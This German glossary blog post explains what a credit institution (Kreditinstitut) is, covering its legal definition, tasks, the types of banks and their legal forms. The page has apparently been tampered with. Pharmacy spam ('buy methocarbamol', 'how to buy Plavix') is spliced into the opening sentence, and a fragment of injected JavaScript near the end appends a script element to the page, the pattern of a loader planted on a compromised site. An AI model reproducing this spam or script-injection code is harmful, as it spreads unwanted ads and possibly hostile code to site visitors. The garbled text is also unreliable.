Was ist ein Kreditinstitut

buy methocarbamol Buying Lithium how to buy Plavix Ein Kreditinstitut ist ein Unternehmen, das gewerbsmäßig Bankgeschäfte durchführt oder in einer Größenordnung betreibt, die einen kaufmännisch eingerichteten Geschäftsbetrieb notwendig macht. Das ist in Deutschland im § 1 des Kreditwesengesetzes (KWG) vom Gesetzgeber so festgelegt. Alle Kreditinstitute mit ihren entsprechenden gesetzlichen oder speziellen Vorschriften sind unter dem Begriff Bank- oder Kreditwesen vereinigt.

Die Aufgabenbereiche eines Kreditinstituts

Kreditinstitute sorgen für ein reibungsloses Funktionieren der Geld- und Kapitalströme und sie führen den baren und unbaren Zahlungsverkehr durch. Dabei sind ihre Schwerpunkte:

Erledigung des Zahlungsverkehrs
Abnahme verzinslicher Einlagen
Das Bedienen mit Krediten und Darlehen
Das Wertpapier- und Emissionsgeschäft

Kreditinstitute fungieren als Finanzintermediär und besitzen die Option der Geldschöpfung. Ihre Überwachung obliegt der Bankenaufsicht, diese wird von den dafür autorisierten Behörden und von der Zentralbank durchgeführt.

Folgende Gruppen von Geldinstituten sind Kreditinstitute

Zentralbank (da sie staatliche Aufgaben wahrnimmt, gehört sie formal nicht zu den Kreditinstituten)
Universalbanken (Geschäftsbanken)
Spezialbanken (privaten Hypothekenbanken, Schiffsbanken)
Banken (Privatbanken, Großbanken, Regionalbanken und Auslandsbanken)
Genossenschaftsbanken (gewähren Kredite nur an Mitglieder)
Sparkassen und Landesbanken
Realkreditinstitute
Bausparkassen (arbeiten nach dem Bausparkassengesetz)
Kreditinstitute mit Sonderaufgaben (z. B. Rentenbanken)
Teilzahlungsbanken (Leasingfinanzierungen)

Des Weiteren gibt es noch supranationale Kreditinstitute, wie die Bank für Internationalen Zahlungsausgleich oder die Europäische Bank für Wiederaufbau und Entwicklung.

Die Rechtsformen

Da ein Kreditinstitut ist als Unternehmen unterschiedlich verfasst. Entweder über eine juristische Person des öffentlichen Rechts oder nach Privatrecht.

Privatrechtliche Unternehmensformen sind:

Personenhandelsgesellschaften (die GmbH & Co. KG, die OHG oder eine KG)
Eingetragene Genossenschaften
Kapitalgesellschaften (Aktiengesellschaft mit besonderer Form)

Öffentlich-rechtliche Unternehmen agieren in Form von Anstalten des öffentlichen Rechts am Markt, so wie beispielsweise die Kreditanstalt für Wiederaufbau oder die Sparkassen und Landesbanken. d.getElementsByTagName('head')[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

This entry was posted in Lexikon. Bookmark the permalink.

Comments are closed.